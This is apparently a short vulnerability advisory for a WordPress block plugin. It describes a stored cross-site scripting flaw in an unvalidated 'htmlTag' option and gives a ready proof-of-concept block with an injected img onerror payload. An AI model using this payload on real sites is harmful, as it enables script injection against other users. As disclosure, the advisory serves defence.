Description The plugin does not validate the htmlTag option in various of its block before outputting it back in a page/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks
As a contributor, put the below code in a post when in Code Editor Mode:
<!-- wp:gutenverse/post-title {"elementId":"guten-sw5SZ2","htmlTag":"img src=x onerror=alert(/XSS-htmlTag/)"} -->
<div class="guten-element guten-post-title guten-sw5SZ2"></div>
<!-- /wp:gutenverse/post-title -->
The XS will be triggered when any user will (pre)view the post